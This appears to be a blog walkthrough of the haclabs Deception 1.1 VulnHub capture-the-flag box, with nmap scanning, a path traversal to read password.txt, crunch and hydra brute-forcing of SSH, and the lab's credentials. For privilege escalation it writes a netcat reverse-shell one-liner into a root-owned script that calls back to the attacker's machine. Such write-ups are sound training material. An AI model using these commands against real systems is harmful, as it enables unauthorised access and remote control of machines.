here it is my another writeup on an amazing ctf type box, i got a very new thaught process while doing this…
Press enter or click to view image in full size
DESCRIPTION:
- Name: haclabs: deception1.1
- Date release: 19 Mar 2020
- Author: HacLabs
- Series: haclabs
- Web page: https://www.haclabs.org/VulnerableLabs/Deception-1.1
This machine is the next part of Deception machine. This time try harder to get root!
To complete this challenge you need to find 3 flags.
flag 2 : Password to unzip the zip file.
flag 1 : Present in /home/yash/
flag 0 : Present in /root/
This is a beginner/intermediate level machine.
Technical Information :
machine is based on Ubuntu 64bit
Tested on virtualBox
DHCP is enabled (set as bridged networking)
NOTE : you may face connection lost issue , no problem restart the virtual machine and everything will start to work again!
I found “646563657074696f6e312e31” this while creating the machine .
Contact
If you have solved this machine in an unintended way then please let us know, you may get a chance to publish your writeup on our website.
Works best in VirtualBox rather than VMware. Note: This is MEANT to be password protected
DOWNLOAD LINK: https://download.vulnhub.com/haclabs/haclabs_deception1.1.zip
So lets start and go for finding the ip address of machine with the very first command we always use netdiscover
netdiscover -i vboxnet0
- -i device: your network device
- for the name of network use command ifconfig
So now lets Start with nmap scan
nmap -v -sCV -A -O -p- 192.168.56.102
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 75:b3:93:d4:f1:02:30:bf:35:ea:12:4e:3b:e7:fa:4a (RSA)
| 256 f9:8c:43:5b:45:7d:fe:84:b1:f5:93:a3:68:bb:ce:84 (ECDSA)
|_ 256 77:2a:33:3e:8f:2b:65:a5:f3:df:b5:bc:58:4a:f4:8e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn’t have a title (text/html).
Lets enumerate:
@PORT 22:
lets try logging as root and check if there is any flag
so there is no flag or hint at port 22
Lets move to port 80
@PORT 80:
Got a login panel at home page
Press enter or click to view image in full size
tried some default credentials admin: admin
Press enter or click to view image in full size
we get a strong password guide
Get Sagar Jain’s stories in your inbox
Join Medium for free to get updates from this writer.
lets try that type of password = Abcd123@
it gives a popup, looks like a php file named “0000flagflagflagflag.php”
by clicking on ok we got another page
Press enter or click to view image in full size
where value of flag is defined as 1
flag=1
may be it is for the given php file
“0000flagflagflagflag.php” = “00001111.php”
lets browse “00001111.php”
there is another popup which says to find password.txt
lets check source code
at end of the source code it says to use ?page=
lets try those
tried for 00001111.php?page=password.txt but didnt worked so tried for more ../password.txt , ../../password.txt and finally it worked.
Press enter or click to view image in full size
yash : ya5h**
here we got a username and first four words from password of 6 words and we have to find the last two words.
lets create a wordlist with crunch of all the combinations
crunch 6 6 -t ya5h@@ -o yash_wordlist
lets bruteforce the password with hydra
hydra -l yash -P ‘yash_wordlist’ 192.168.56.102 ssh
Press enter or click to view image in full size
we got the password yash: ya5hay, lets login
ssh yash@192.168.56.102
Press enter or click to view image in full size
i think it is the flag1.txt
Privilage Escalation:
Got a .sh file having the ownership of root and permission of read & write
lets take a reverse connection to our main pc with perm.sh file
echo ‘#!/bin/bash’ > perm.sh
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4455 >/tmp/f’ >> perm.sh
start a listener and wait
nc -lvp 4455
Got ROOT
Press enter or click to view image in full size
DONE.
please give your Precious feedback at twitter @c0rrupt3d_brain .